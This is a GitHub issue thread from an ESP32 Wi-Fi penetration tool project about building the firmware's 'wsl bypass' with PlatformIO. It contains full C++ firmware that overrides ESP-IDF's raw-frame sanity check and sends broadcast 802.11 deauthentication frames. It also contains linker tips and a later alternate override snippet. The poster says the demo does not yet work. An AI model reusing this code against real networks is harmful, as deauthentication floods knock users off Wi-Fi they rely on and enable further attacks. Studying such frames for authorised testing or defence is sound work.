risinek/esp32-wifi-penetration-tool #12: Is it possible to use the wsl bypass with platformio?

justcallmekoko, 2021-07-22:
I would like to build a similar project which will require the installation of ESP-IDF v4.1 and the use of the wsl bypass method shown in this repo?

Do you know if it is possible to accomplish this using Platformio? I have doing quite a bit of research and going down quite a few rabbit holes but have found no solution.

risinek, 2021-07-23:
I'm not familiar with platformio unfortunately. I think one possibility is to precompile `wsl_bypasser` from this repo and then link it while compiling using Platformio - e.g. [like described here](https://community.platformio.org/t/how-can-i-link-precompiled-libraries/4569/5). 
Second option is to use same flag for linker like it's done in this repo in cmakefile as it seems doable based on [this documentaion](https://docs.platformio.org/en/latest/projectconf/section_env_build.html#build-flags)

justcallmekoko, 2021-07-23:
@risinek So I managed to get the ESP-IDF framework working in Platformio using [Arduino as Component](https://community.platformio.org/t/framework-espidf-arduino/14949).

I am not familiar with the process for installing the esp-idf in Platformio, but I managed to get the Platformio version of the ESP-IDF [here](https://github.com/platformio/platform-espressif32). The version I installed however translates to version 4.2 of the ESP-IDF. I could not find one for 4.1...so this might be contributing to the problem. Not sure.

I wrote a small demo code that initializes wifi, transmits 10 deauth frames, sleeps for 10 seconds, then reboots (See code below).

I run the code on my ESP32 but wireshark does not show any deauths being sent. I verified my wsl bypass is being called instead of the original by placing a printf in the method to show it is being called. I also verified my `-zmuldefs` flag in my cmakelist is set properly by removing it, building, and seeing it fail with an error that there are multiple definitions of the sanity check function. I set the flag again then it built properly.

I just want to verify my source code so I can eliminate it as a possibility for this demo not working. I suspect if it is not an issue with my source then it is an issue with the version of the ESP-IDF I installed.

By the way, thank you for taking the time to help me out. I know this isn't necessarily related to your project, but this is the only other place I have see someone talking about getting an ESP32 to send deauthentication frames.

## Code
```C++
#include <stdio.h>
#include "sdkconfig.h"
#include "freertos/FreeRTOS.h"
#include "freertos/task.h"
#include "esp_log.h"
#include "esp_err.h"
#include "esp_system.h"
#include "esp_spi_flash.h"
#include "esp_wifi.h"
#include "esp_wifi_types.h"

static uint8_t original_mac_ap[6];

const wifi_promiscuous_filter_t filt = {.filter_mask=WIFI_PROMIS_FILTER_MASK_MGMT | WIFI_PROMIS_FILTER_MASK_DATA};

static const uint8_t deauth_frame_default[] = {
    0xc0, 0x00, 0x3a, 0x01,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xCE, 0xCC, 0x45, 0x69, 0xEB, 0x14,
    0xCE, 0xCC, 0x45, 0x69, 0xEB, 0x14,
    0xf0, 0xff, 0x02, 0x00
};

static void wifi_event_handler(void *event_handler_arg, esp_event_base_t event_base, int32_t event_id, void *event_data){

}

int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3){
    printf("Sanity check bypass called!\n");
    return 0;
}

void wsl_bypasser_send_raw_frame(const uint8_t *frame_buffer, int size){
    esp_wifi_80211_tx(WIFI_IF_AP, frame_buffer, size, false);
}

static void wifi_init_apsta(){

    wifi_init_config_t wifi_init_config = WIFI_INIT_CONFIG_DEFAULT();

    esp_wifi_init(&wifi_init_config);
    esp_wifi_set_promiscuous_filter(NULL);
    esp_wifi_set_promiscuous(true);
    esp_wifi_set_max_tx_power(78);
    esp_wifi_set_storage(WIFI_STORAGE_RAM);
    esp_wifi_set_mode(WIFI_MODE_APSTA);
    esp_wifi_set_channel(11, WIFI_SECOND_CHAN_NONE);

    esp_wifi_start();
}

void app_main(void)
{
    printf("Hello world!\n");

    
    printf("ESP-IDF version is: ");
    printf(esp_get_idf_version());
    printf("\n");

    wifi_init_apsta();

    sleep(0.1);

    for (int i = 0; i < 10; i++) {
        printf("Sending deauth...\n");
        wsl_bypasser_send_raw_frame(deauth_frame_default, sizeof(deauth_frame_default));
        sleep(1);
    }

    for (int i = 10; i >= 0; i--) {
        printf("Restarting in %d seconds...\n", i);
        vTaskDelay(1000 / portTICK_PERIOD_MS);
    }
    printf("Restarting now.\n");
    fflush(stdout);
    esp_restart();
    
}
```

closed 2021-08-07 by justcallmekoko

qqsharki4, 2026-01-17:
```
__attribute__((used)) int ieee80211_raw_frame_sanity_check(void* frame, int len) {
    return 0;
}
```